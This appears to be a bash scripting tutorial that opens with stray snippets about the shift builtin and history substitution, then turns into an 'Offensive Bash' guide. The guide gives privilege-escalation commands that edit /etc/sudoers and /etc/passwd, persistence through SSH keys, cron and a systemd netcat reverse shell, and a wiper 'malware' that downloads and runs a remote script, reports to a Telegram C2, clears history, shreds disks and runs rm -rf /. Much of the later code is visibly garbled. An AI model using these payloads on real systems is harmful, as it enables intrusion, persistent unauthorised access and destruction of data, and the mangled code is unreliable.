    status is 127. Otherwise, the return status is the exit status of the last process or job waited for.
#!/bin/bash

CNT=$1
if [[ "$CNT" -lt 1 ]]; then
    CNT=1
fi

for (( i=0; i<"$CNT"; i++ ))
do
    echo "hello $i"
done

wait
echo "done"

shift

What is the purpose of using shift in shell scripts?

I have came across this script:

#! /bin/bash

if (( $# < 3 )); then
  echo "$0 old_string new_string file [file...]"
  exit 0
else
  ostr="$1"; shift
  nstr="$1"; shift
fi

echo "Replacing \"$ostr\" with \"$nstr\""
for file in $@; do
  if [ -f $file ]; then
    echo "Working with: $file"
    eval "sed 's/"$ostr"/"$nstr"/g' $file" > $file.tmp
    mv $file.tmp $file
  fi
done

What is the meaning of the lines where they use shift? I presume the script should be used with at least arguments so…?

Answers:

shift is a bash built-in which kind of removes arguments from the beginning of the argument list. Given that the 3 arguments provided to the script are available in $1, $2, $3, then a call to shift will make $2 the new $1. A shift 2 will shift by two making new $1 the old $3. For more information, see here:

Tricks

https://0x00sec.org/t/use-the-past-to-conquer-the-future-a-how-to-on-bash-history-substitution/12977

!! -> execute last command
!$ -> return last argument
!^ -> return first argument
!* -> return all arguments
!:n -> return the string on nth position
!:n-x -> return position n to x
!:n* -> return all arguments starting with n
!n -> execute command with history number n
!-n -> exectue command that was run n commands back
!?str -> execute first command (going up) that matches str
!?str? -> execute first command (going up) that contains str
!:h -> return path up to bas filename
!:t -> return only base filename
!:r -> return path up to extension
!:e -> return only extension
!:s/str1/str2 -> substitute first occurence of str1 with str2
!:gs/str1/str2 -> substitute all occurences of str1 with str2
!:& -> repeat last successful substitution
!:g& -> repeat last successful substitution and make it global
!:p -> don’t execute, print only

Offensive Bash

Okay, let’s pull everything together and dive into some offensive bash scripting. We’ll start with something basic, using our Linux know-how and what we’ve picked up to write a simple offensive script. We’ll focus on bash tricks that streamline our offensive tactics. And just for kicks, we’ll cap it off with a little malware— for fun, of course. Ready? Let’s get started!

First up, let’s create a tool to gather info about the system. This info can be super handy for things like boosting privileges and staying on a target system once we’ve gained access.

Enumeration

Information Gathering Functions. We’ll call it user_info. This function collects user and group details using commands such as id, lastlog, and w. It gives us info on the current user and group, folks who’ve logged in before, and those logged in now. Plus, it looks out for root accounts, hashes stored in /etc/passwd, readable /etc/shadow files, and other important files.

user_info(){
    echo -e "\n\t${green}${bold}USER AND GROUP INFORMATION${reset}\n"

    user_info=`id`
    echo -e "${red}[+] Current user/group info:${reset}\n$user_info\n"

    # Last login times
    last_logged_users=`lastlog | grep -v "*Never*" 2>/dev/null`
    if [ "$last_logged_users" ]; then
        echo -e "${red}[+] Users who previously logged into the system:${reset}\n$last_logged_users\n"
    fi


    # Currently logged in users
    logged_in_users=`w`
    if [ "$logged_in_users" ]; then
        echo -e "${red}[+] Users who are currently logged in:${reset}\n$logged_in_users\n"
    fi

    # Check for hashes stored in /etc/passwd
    passwd_hashes=`grep -v '^[^:]*:[x]' /etc/passwd`
    if [ "$passwd_hashes" ]; then
        echo -e "${yellow}[+] /etc/passwd seems to contain hashes!${reset}\n$passwd_hashes\n"
    fi

    # Content of /etc/passwd
    passwd_content=`cat /etc/passwd`
    if [ "$passwd_content" ]; then
        echo -e "${red}[+] Content of /etc/passwd:${reset}\n$passwd_content\n"
    fi

    # /etc/shadow readable?
    shadow_readable=`cat /etc/shadow 2>/dev/null`
    if [ "$shadow_readable" ]; then
        echo -e "${yellow}[+] /etc/shadow can be read!${reset}\n$shadow_readable\n"
    fi

    # Check if /etc/master.passwd can be read (BSD)
    master_passwd_readable=`cat /etc/master.passwd 2>/dev/null`
    if [ "$master_passwd_readable" ]; then
        echo -e "${yellow}[+] master.passwd can be read!${reset}\n$master_passwd_readable\n"
    fi

    # Root accounts (uid 0)
    root_accounts=`grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'`
    if [ "$root_accounts" ]; then
        echo -e "${red}[+] Accounts with root privileges:${reset}\n$root_accounts\n"
    fi

    # View if sensitive files can be read/written
    echo -e "${red}[-] View if sensitive files can be read/written:${reset}"
    ls -la /etc/passwd 2>/dev/null
    ls -la /etc/group 2>/dev/null
    ls -la /etc/profile 2>/dev/null
    ls -la /etc/shadow 2>/dev/null
    ls -la /etc/master.passwd 2>/dev/null

    # Sudoers info
    sudoers_info=`grep -v -e '^$' /etc/sudoers 2>/dev/null | grep -v "#" 2>/dev/null`
    if [ "$sudoers_info" ]; then
        echo -e "${red}[+] Sudoers config:${reset}$sudoers_info\n"
    fi

    # Can sudo be executed without a password?
    sudo_no_password=`echo '' 2>/dev/null | sudo -S -l -k 2>/dev/null`
    if [ "$sudo_no_password" ]; then
        echo -e "${yellow}[+] Sudo can be used without a password!${reset}\n$sudo_no_password\n"
    fi

    # Known binaries that can be executed with sudo - xargs uses only 1 argument
    sudo_binaries=`echo '' | sudo -S -l -k 2>/dev/null | xargs -n 1 2>/dev/null | sed 's/,*$//g' 2>/dev/null | grep -w $binaries 2>/dev/null`
    if [ "$sudo_binaries" ]; then
        echo -e "${yellow}[+] Binaries susceptible to exploitation with sudo:${reset}\n$sudo_binaries\n"
    fi

    # Check if root's home directory is accessible
    root_home_directory=`ls -ahl /root/ 2>/dev/null`
    if [ "$root_home_directory" ]; then
        echo -e "${yellow}[+] We can access the root's home directory!${reset}\n$root_home_directory\n"
    fi

    # Home directory permissions
    home_directory_permissions=`ls -ahl /home/ 2>/dev/null`
    if [ "$home_directory_permissions" ]; then
        echo -e "${red}[+] Home directory permissions:${reset}\n$home_directory_permissions\n"
    fi

    # Search for files that we can write but do not belong to the current user
    writable_files=`find / -writable ! -user \`whoami\` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null`
    if [ "$writable_files" ]; then
        echo -e "${red}[+] Files that can be written to and do not belong to your user:${reset}\n$writable_files\n"
    fi

    # Search for hidden files
    hidden_files=`find / -name ".*" -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -alh {} \; 2>/dev/null`
    if [ "$hidden_files" ]; then
        echo -e "${red}[+] Hidden Files:${reset}\n$hidden_files\n"
    fi

    # Check if root can log in via SSH
    ssh_root_login=`grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v "#"`
    if [ "$ssh_root_login" = "yes" ]; then
        echo -e "${red}[+] Root can log in via SSH:${reset}" ; grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v "#"\n
    fi
}

Next we collects information about the system’s env, including variables, status, $PATH variable configuration, available shells, and password policies defined in /etc/login.defs

env_info() {
  echo - e "\n\t${green}${bold}ENVIRONMENT INFORMATION${reset}\n"

  # Environment variable information
  env_info = `env 2>/dev/null | grep -v 'LS_COLORS' 2>/dev/null`
  if ["$env_info"];
  then
  echo - e "${red}[+] Environment variable information:${reset}\n$env_info\n"
  fi

  # Check
  if SELinux is enabled(MAC security mechanism in the kernel)
  selinux_status = `sestatus 2>/dev/null`
  if ["$selinux_status"];
  then
  echo - e "${red}[+] SELinux is present on the system:${reset}\n$selinux_status\n"
  fi

  # Configuration of the $PATH variable(stores executable locations)
  path_info = `echo $PATH 2>/dev/null`
  if ["$path_info"];
  then
  echo - e "${red}[+] PATH Variable:${reset}\n$path_info\n"
  fi

  # Available shells
  shell_info = `cat /etc/shells 2>/dev/null`
  if ["$shell_info"];
  then
  echo - e "\n${red}[+] Available Shells:${reset}\n$shell_info\n"
  fi

  # Password policy present in the file: /etc/login.defs
  login_defs = `grep "^PASS_MAX_DAYS\| ^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null`
  if ["$login_defs"];
  then
  echo - e "${red}[+] Password policy information:${reset}\n$login_defs\n"
  fi
}

Privilege Escalation

This two function will be used for privesc check and Hunting searching for SUID/SGID files, git credentials, .plan files, etc. and also known kernel exploits based on the system’s kernel version.

misc() {
  echo - e "\n\t${green}${bold}ADDITIONAL CHECKS${reset}\n"

  # Check
  if known applications
  for privilege escalation are available
  echo - e "${red}[-] Location of executables that may be useful for privilege escalation:${reset}";
  which nc 2 > /dev/null;
  which netcat 2 > /dev/null;
  which wget 2 > /dev/null;
  which nmap 2 > /dev/null;
  which gcc 2 > /dev/null;
  which curl 2 > /dev/null\
  n

  # List SUID files that may be interesting and are in the binaries list
  int_suid = `find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null | grep -w $binarios 2>/dev/null`
  if ["$int_suid"];
  then
  echo - e "${yellow}[+] Interesting SUID files:${reset}\n$int_suid\n"
  fi

  # Writable SUID files
  w_suid = `find / -perm -4007 -type f -exec ls -la {} 2>/dev/null \;`
  if ["$w_suid"];
  then
  echo - e "${yellow}[+] Writable SUID files:${reset}\n$w_suid\n"
  fi

  # Writable SUID files owned by root
  w_suid_root = `find / -uid 0 -perm -4007 -type f -exec ls -la {} 2>/dev/null \;`
  if ["$w_suid_root"];
  then
  echo - e "${yellow}[+] Writable SUID files owned by root:${reset}\n$w_suid_root\n"
  fi

  # Search
  for SGID files
  find_sgid = `find / -perm -2000 -type f -exec ls -la {} 2>/dev/null \;`
  if ["$find_sgid"];
  then
  echo - e "\n${red}[+] SGID Files:${reset}\n$find_sgid\n"
  fi

  # List SGID files that may be interesting and are in the binaries list
  int_sgid = `find / -perm -2000 -type f -exec ls -la {} \; 2>/dev/null | grep -w $binarios 2>/dev/null`
  if ["$int_sgid"];
  then
  echo - e "${yellow}[+] Interesting SGID files:${reset}\n$int_sgid\n"
  fi

  # List writable SGID files
  w_sgid = `find / -perm -2007 -type f -exec ls -la {} 2>/dev/null \;`
  if ["$w_sgid"];
  then
  echo - e "${yellow}[+] Writable SGID files:${reset}\n$w_sgid\n"
  fi

  # Writable SGID files owned by root
  w_sgid_root = `find / -uid 0 -perm -2007 -type f -exec ls -la {} 2>/dev/null \;`
  if ["$w_sgid_root"];
  then
  echo - e "${yellow}[+] Writable SGID files owned by root:${reset}\n$w_sgid_root\n"
  fi

  # Search
  for files with git credentials
  git_cred = `find / -name ".git-credentials" 2>/dev/null`
  if ["$git_cred"];
  then
  echo - e "${yellow}[+] Git credentials saved!:${reset}\n$git_cred\n"
  fi

  dockerfile_path = $(find / -name "Dockerfile"
    2 > /dev/null)
  if ["$dockerfile_path"];
  then
  echo - e "${yellow}[+] Dockerfile found!:${reset}\n$dockerfile_path\n"
  fi

  # Search
  for.plan files in home directory, may contain useful information
  usr_plan = `find /home -iname *.plan -exec ls -la {} \; -exec cat {} 2>/dev/null \;`
  if ["$usr_plan"];
  then
  echo - e "${red}[+] .plan files content and permissions:${reset}\n$usr_plan\n"
  fi

  # Search
  for.bkp files
  bkp_files = `find / -iname *.bkp -exec ls -la {} 2>/dev/null \;`
  if ["$bkp_files"];
  then
  echo - e "${red}[+] .bkp files:${reset}\n$bkp_files\n"
  fi

  # Any rhost available ? -may allow logging in as another user
  rhosts_usr = `find /home -iname *.rhosts -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;`
  if ["$rhosts_usr"];
  then
  echo - e "${yellow}[+] rhost and content:${reset}\n$rhosts_usr\n"
  fi

  # Check user files
  usr_hist = `ls -la ~/.*_history 2>/dev/null`
  if ["$usr_hist"];
  then
  echo - e "${red}[+] Accessible history files:${reset}\n$usr_hist\n"
  fi

  # Check
  if root history is accessible
  root_hist = `ls -lha /root/.*_history 2>/dev/null`
  if ["$root_hist"];
  then
  echo - e "${yellow}[+] Root history accessible! May contain passwords!!!${reset}\n$root_hist\n"
  fi
}

Now this called for kernel version and known CVE check, we utilizes a series of regular expressions to match the kernel version against a predefined list of known vulnerabilities. If a match is found, it displays the corresponding CVE identifier or exploit reference, of course this is now the best way to do it but it will work.

Hunt(){
        hits=0
        declare -A exploits
        exploits=(
            ["2.4.(20|25|26|27)"]="CVE-2004-0077"
            ["2.4.29"]="CVE-2004-1235"
            ["2.6.(34|35|36)"]="caps_to_root (https://github.com/SecWiki/linux-kernel-exploits/blob/master/2004/caps_to_root/15916.c)" 
        )
        kernel=$(uname -r)
        for exploit in "${!exploits[@]}"; do
            if echo "$kernel" | grep -E -q "$exploit"; then
                echo "${red}${bold}<.>${reset} ${exploits[$exploit]}" 
                ((hits++))
            fi
        done
        if [ $hits -eq 0 ]; then
            echo "${red}No exploits found${reset}"
        else
            echo "(${hits} hits)"
    fi
}

Now, let’s use all the gathered system information to boost our privileges. We’ll make a simple function to handle everything we’ve talked about. This function, called escalate, will go through each step we’ve outlined in the conmethods function.

In conmethods, we’ll set up different actions to do things like change system files, exploit weaknesses, and find ways to get more access. These actions are all about making sure we get more control over the system’s important stuff.

So, how does it work? The escalate function is like a package for the conmethods function. Inside conmethods, we have a bunch of actions aimed at boosting our privileges.

When we use the escalate function, it kicks off the conmethods function. Then, conmethods does its thing, running through each action we’ve set up. These actions include stuff like tweaking files such as /etc/sudoers and /etc/passwd, exploiting weaknesses like Docker problems, and hunting down files with special access rights or that have been changed recently.

Each action gets checked to see if it works or not. If it works, we’ll see a message saying it did. If not, we’ll know it failed.

escalate() {
  conmethods() {
    cat << -EOF *
      Write "$USER ALL=(ALL) NOPASSWD: ALL"
    to / etc / sudoers *
      Make every user root *
      Read doas config *
      Exploit Docker bash container exploit *
      Attempt to find suid *
      Get last edited files *
      List all capabilities
    EOF

    echo - e "\n"
    read - p "${blue}Press 'Enter' to continue${reset}"

    declare - a methods = (
      "echo '$USER ALL=(ALL) NOPASSWD: ALL' >>/etc/sudoers"
      "sed -i -e 's/x:1000:1000:/x:0:0:/g' /etc/passwd"
      "cat /etc/doas.conf"
      "docker run -it --rm -v $PWD:/mnt bash echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd >2/dev/null"
      "find / -perm 4000 2>/dev/null"
      "find / -mmin -10 2>/dev/null | grep -Ev '^/proc'"
      "getcap -r / 2>/dev/null"
    )

    for method in "${methods[@]}";
    do
      if eval "$method";
    then
    echo - e "$method"
    echo - e "${yellow}[*] Method Succeeded [*]\n${reset}"
    sleep 3
    else
      echo - e "${red}[*] Method Failed! [*]\n${reset}"
    fi
    done
  }

  conmethods
}

Persistence

Let’s talk known MITRE ATT&CK Persistence Techniques, Persistence consists of techniques to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code.

Gaining an initial foothold is not enough, you need to set up and maintain persistent access to your targets. The techniques outlined under the Persistence tactic provide us with a clear and methodical way of obtaining establishing persistence on the target system.

  • Account Manipulation
    • Persistence via SSH Keys
  • Creating a privileged local account
  • Unix shell configuration modification
    • Backdooring the .bashrc file
  • Web Shell/Backdoor
  • Cron jobs

    Persistence via SSH Keys:

SSH keys offer an alternative authentication mechanism for remote access. By adding our public SSH key to the authorized_keys file of a target user’s .ssh directory, we can gain persistent access to the system. This method allows us to authenticate without requiring a password, ensuring ongoing access even if credentials change.

if [[ -d /root/.ssh ]]; then
    continue
else
    mkdir /root/.ssh
fi

Once the directory is ensured to exist, the script proceeds to add a public SSH key to the authorized_keys file within the .ssh directory. This is done to enable passwordless SSH access to the root user account.

if [[ -f /root/.ssh/authorized_keys ]]; then
    echo 'PUBLIC_SSH_KEY_HERE' >> /root/.ssh/authorized_keys
else
    touch /root/.ssh/authorized_keys
    echo 'PUBLIC_SSH_KEY_HERE' > /root/.ssh/authorized_keys
fi

If the authorized_keys file already exists, the script appends the public SSH key to it. Otherwise, it creates the file and adds the key.

Cron jobs:

  • Cron is a time-based job scheduler in Unix-like systems. Abusing cron, we can schedule malicious commands or scripts to run at specific intervals, providing us with persistent access to the system. In our script, we modify the system’s crontab to execute a script every 10 minutes (/dev/foo/.proc/proc) and establish a beacon connection every 30 minutes, ensuring continual access.

modifies the system’s crontab file (/etc/crontab) to schedule the execution of a script every 10 minutes and establish a beacon connection every 30 minutes.

echo "*/10 * * * * root /bin/sh /dev/foo/.proc/proc &" >> /etc/crontab
echo "*/30 * * * * root /bin/sh rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc IP_ADDRESS 443 >/tmp/f" >> /etc/crontab

The first line schedules the execution of /dev/foo/.proc/proc every 10 minutes. This script likely performs actions necessary for maintaining access or executing additional payloads.

The second line schedules the establifooent of a beacon connection every 30 minutes. It creates a FIFO pipe (/tmp/f), listens for incoming commands via Netcat (nc), and executes them with Bash (/bin/bash). This setup ensures a continuous channel for remote command execution.

# Persistance via service
# Get shell variable
shell=$(which bash)
touch /etc/systemd/system/network.service
chmod +x /etc/systemd/system/network.service
echo '[Unit]' > /etc/systemd/system/network.service
echo 'Description=Network Service' >> /etc/systemd/system/network.service
echo 'Documentation=man:nc(1)' >> /etc/systemd/system/network.service
echo 'After=network.target' >> /etc/systemd/system/network.service

echo '[Service]' >> /etc/systemd/system/network.service
echo 'Type=Simple' >> /etc/systemd/system/network.service
echo 'User=root' >> /etc/systemd/system/network.service
echo "ExecStart=$shell -c 'bash -i >& /dev/tcp/IP_ADDRESS/1111 0>&1'" >> /etc/systemd/system/network.service
echo 'Restart=Always' >> /etc/systemd/system/network.service

echo '[Install]' >> /etc/systemd/system/network.service
echo 'WantedBy=multi-user.target' >> /etc/systemd/system/network.service

# Enable on boot and reload daemon + start the new service beacon
systemctl daemon-reload
sleep 1
systemctl enable network.service
systemctl start network.service
sleep 1

Bash and Malware

Yes! Malware can be written in bash, and there are plenty of simple examples out there. However, bash scripts are interpreted, making them susceptible to inspection and analysis by security researchers. That said, many system administrators aren’t researchers, and not all Linux systems are actively monitored or managed by knowledgeable users like servers. In some cases, manual inspection is unlikely.

Plus, we can heavily obfuscate the code to make it harder to beautify and run thorough pre-project tests before deploying it.

Okay, here’s the plan. We’ll start by written a bunch of Bash scripts, making sure they’re complex and have multiple stages. This way, if one gets caught, we’ve got backups ready to go. Just remember, this is only a proof of concept (PoC). So, we’ll document everything carefully, noting each step it takes on the target system. This way, we’re ready for anything, and we’ve got all the bases covered.

check_root() {
  if ["$EUID" - ne 0]
  then echo "Please run as root" // Hehe 
  rm - rf $PATH_TEMP_FILE / $NAME_SCRIPT 
  exit 
    fi
}

check_curl() {
  apt - get install curl--yes
  apt - get install wget--yes
  yum install curl - y
  yum install wget - y
  rm - rf /
    var / log / yum *
}

Before we dive in, let’s do a quick internet test. We don’t want any surprises, right? 😉 So, here’s the common workflow: we start by making sure the environment is good to go for execution. Specifically, we check if the script is running with root privileges and if its dependencies, like curl and wget, are installed on the system. If they’re not, we’ll try to install them using both the apt and yum package managers.

if ["$(cat /proc/version | grep Linux)"];
then
continue
else
  rm foo.sh
exit 2
fi

#ensure that it is a systemd system
if ["$(ps -elf | grep -E '/sbin/init | /lib/systemd/system | /usr/lib/systemd/systemd' | grep -v grep)"];
then
continue
else
  rm foo.sh
exit 3
fi

#internet test
interweb = $(ping - c 4 8.8 .8 .8 | grep "64 bytes" | cut - d " " - f1, 2)
if ["$interweb"];
then
echo "Yes internet"
#would want to put a call out here
else
  echo "No internet"
#need to think of something to go here as well
fi

#test
for "fake internet access"
fake = $(ping - c 4 999.999 .999 .999 | grep "64 bytes" | cut - d " " - f1, 2)
if ["$fake"];
then
rm foo.sh
exit 7
else
  continue
fi

Okay, here’s the plan: If the conditions aren’t met, we delete ourselves. But if everything looks good, we’ll proceed. We’ll download and install a Telegram bot from a specific endpoint that’s hardcoded into the script. The program will be saved under /usr/share/,

bash ()
{
curl -s http://10.10.0.0/bash.sh -o "/tmp/bash.sh";cd /tmp;chmod +x bash.sh;./bash.sh;
}

and then it’ll execute. After that, it’ll call home using the Telegram API with a hardcoded API key. This communication channel will be used to report on the progress of the malware file—its infection and spreading, Sends via the Telegram API the 2nd argument (message) to the Telegram chat with ID given in the

# URL = 'https://api.telegram.org/bot'
$TOKEN '/sendMessage?chat_id='
$1

send_message()
{
  res = $(curl - s--insecure--data - urlencode "text=$2"
    "$MSG_URL$1&" & )
}

Reports to the C2 via Telegram API that it is installed in this host.

tele_send_fase1() {
  for id in $ID_MSG # id = {
    123355992
    192828929
  }
  do
    send_message $id "$(hostname): malw is installed."
  done
}

Alright, once we’ve got everything set up, it’s time to get a bit destructive. Here’s the plan:

First, we’ll check two conditions:

  1. The script is running with root privileges.
  2. The commands dd, uname, and sed are available.

We put with the condetion at place if they meet It destroys its own file by first shredding it and then removing the file, and clears and disables the bash history and removes the ~/.bash_history file:

function clear_history() {
  # Clear the history
  for the current shell and destroys the.bash_history file
  set - o history
  history - c
  history - w
  set + o history
  cat "/dev/null" > "$bash_hist_file"
  # Set history size to zero and signal in bash_hist_file
  unset bash_hist_file
  bash_hist_file = "/dev/null"
  HISTSIZE = 0
  HISTFILESIZE = 0
}

If passed, we’ll use shred as the preferred wiping command with just one pass instead of the default three. If shred isn’t installed on the system, we’ll use dd from /dev/urandom.

function select_wiping_command() {
  local retval = 0

  if command - v shred & > /dev/null;
  then
  wipecmd = "shred"
  wipeargs = "-n 1 -x -z "
  # n = 1 iterations(interesting, less than the
    default 3)
  # - x doesn 't round file sizes up to the next full block
  # - z add a final overwrite with zeros to hide shredding
  elif command - v dd & > /dev/null;
  then
  wipecmd = "dd"
  wipeargs = "bs=1k if=/dev/urandom of="
  # reads and writes 1 k bytes at a time
  # input is random bytes
  else
    retval = 1
  fi

  return $retval
}

The downloaded malware will then execute the core destructive steps:

  • It checks if the following services are running: apache, http, and ssh. Each running service in that list will be stopped, disabled, and their systemd files removed. The systemd daemon is then relaunched.
function stop_and_disable_service() {
  local service_name = "${1}.service"
  # service name passed as first argument
  local dir
  local full_file_name

  if systemctl--quiet is - active $service_name > /dev/null
  2 > & 1;
  then #
  if the service name is active(currently running)

  systemctl stop $service_name > /dev/null
  2 > & 1 # stop it
  chkconfig off $service_name > /dev/null
  2 > & 1 # disable it at boot(using chkconfig)
  systemctl disable $service_name > /dev/null
  2 > & 1 # disable it at boot(using systemctl)

  for dir in "${systemd_dirs[@]}";
  do # search
  for
  the service file in the systemd directories

  full_file_name = "${dir}/${service_name}"

  if test_file_exists "$full_file_name";
  then #
  if the file exists...

    rm $full_file_name > /dev/null
  2 > & 1 #...remove it
  fi
  done

  systemctl daemon - reload > /dev/null
  2 > & 1 # reload the systemd daemon after deleting the service
  systemctl reset - failed > /dev/null
  2 > & 1 # reset all units(services) with failed status

  fi
}
  • It deletes the /boot, /home, and /var/log directories.
declare - a systemd_dirs = (# list of systemd directories.Used to search
    for "/etc/systemd/system"
    # and kill some running services(apache, http "/lib/systemd/system"
      # and ssh)
    "/usr/lib/systemd/system"

function delete_directories() {
  local dir_list = $1
  local f

  for f in $ {
    dir_list
  };
  do
    if [-d "$f"];
  then
  rm - rf $f--no - preserve - root > /dev/null
  2 > & 1 # note the--no - preserve - root flag
  fi
  done
}
  • It finds disks attached to the system using two methods: processing the output of lsblk (considering only disks) and enumerating /dev names. If at least one disk is found, they’re wiped in parallel using the chosen method (shred or dd).
function wipe_disks() {
  local retval = 0
  local ev
  local file
  local i = 0
  local - a pidlist
  local p

  if [
    ["${#disk_list[@]}" - gt 0]
  ];
  then

  for file in "${disk_list[@]}";
  do
    ev = $(eval "$wipecmd $wipeargs$file 2>/dev/null") &
    pidlist[$ {
      i
    }] = $!# get pid of the wiping command just launched((i++))

  if ["$ev"];
  then
  retval = 1
  fi
  done
  for p in $ {
    pidlist[@]
  };
  do
    wait $p # wait
  for
  the wiping command to finish
  done
  fi

  return $retval
}

function find_disks() {
  local retval = 1
  local lsblk_output
  local lsblk_output_clean
  local devname
  local devtype
  local full_devname
  local n

  lsblk_output = $(lsblk--nodeps--noheadings--output NAME, TYPE 2 > /dev/null) # lists block devices.
  # no holder devices or slaves, no headings
  if [
    [!-z "$lsblk_output"]
  ];
  then

  lsblk_output_clean = $(echo "$lsblk_output" | sed 's/[[:space:]]\+/ /g') # remove extra spaces from the list
  # this is never used!
    if ["$lsblk_output_clean"];
  then
  n = 0
  while read - r devname devtype;
  # read device name and type
  do
    if ["$devtype" == "disk"];
  then # only care about disks
  full_devname = "/dev/${devname}"
  if test_file_exists "$full_devname";
  then #
  if the device file exists...
    disk_list[$n] = $full_devname #...add it to the list((n++))
  retval = 0 # there 's at least one disk
  fi
  fi
  done << < "$lsblk_output"
  # Bug ? Should be $lsblk_output_clean ?
    fi
  fi

  if [
    [$retval - eq 1]
  ];
  then #
  if no disks found in lsblk output

  n = 0
  disk_list = ()
  for c in h s;
  do
    for devname in $ {
      c
    }
  d {
    a..z
  };
  do # iterate over {
    hda,
    ...,
    hdz,
    sda,
    ...,
    sdz
  }
  full_devname = "/dev/${devname}"
  # add those that exist
  if test_file_exists "$full_devname";
  then
  disk_list[$n] = $full_devname((n++))
  retval = 0
  fi
  done

  done
  fi

  return $retval
}
  • Finally, it recursively deletes the root directory (rm -rf / --no-preserve-root). Then, it tries to remove the wiper script again.
  # Removes /
    rm - rf / --no - preserve - root > /dev/null
  2 > & 1
}

END

Well, that’s all for now. I hope you’ve learned something new. We covered a lot of ground, from basic syntax to developing reconnaissance tasks, parsing tool output for important information, and using bash techniques to navigate restricted networks more efficiently. And we even wrote a simple malware.

But don’t rush through it. Take your time to go through each part and understand it by reading the comments in the scripts. Bash is one of those essential skills that I believe everyone should have or at least be comfortable with. Its powerful scripting capabilities allow you to scale your attacks and create your own tools when needed.